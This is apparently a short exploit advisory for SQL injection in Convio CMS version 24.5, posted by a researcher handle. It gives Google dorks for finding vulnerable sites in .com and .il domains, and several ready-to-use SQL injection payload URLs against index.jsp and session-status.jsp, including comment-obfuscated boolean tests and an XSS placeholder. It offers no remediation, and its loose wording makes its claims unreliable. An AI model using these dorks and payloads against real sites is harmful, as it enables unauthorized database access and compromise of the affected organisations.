/*!
- # VULNERABILITY: Convio CMS SQL injection Vulnerabilities version 24.5 (Work for ALL VERSION 24)
- # Authenticated Persistent SQL injection
- # GOOGLE DORK: site:.com /about/news/index.jsp?page=2
- # GOOGLE DORK: site:.il /about/news/index.jsp?page=2
- # DATE: November 2024
- # SECURITY RESEARCHER:  E1.Coders
- # VENDOR: Convio CMS [ http://www.convio.com   ]
- # SOFTWARE LINK:   http://www.convio.com/
- # CWE: CWE-89
*/
 
 
### -- [ Info: ]
 
[i] A valid persistent SQL INJECTION vulnerability was discovered in of the Convio version 24.5 website installed.
 
[i] Vulnerable parameter(s): - inurl:.com /about/news/index.jsp?page=2
 
 
### -- [ Impact: ]
 
[~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
 
 
### -- [ Details: ]
 
[~] vulnerable file is "index.jsp" and "session-status.jsp"
 
 
### -- [ EXPLOIT : ]
 
https://www.TARGET.com/about/news/index.jsp?page=2{sql   inject code}
 
https://www.TARGET.com/about/news/index.jsp?page=2   RLIKE (case when  7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end)
 
https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379--
 
https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/ '%'='
 
https://www.TARGET.com/search/?q =<XSS SCRIPT BYPASS>
 
 
### -- [ Contacts: ]
 
[+] E-Mail:   E1.Coders@Mail.Ru
 
[+] GitHub: @e1coders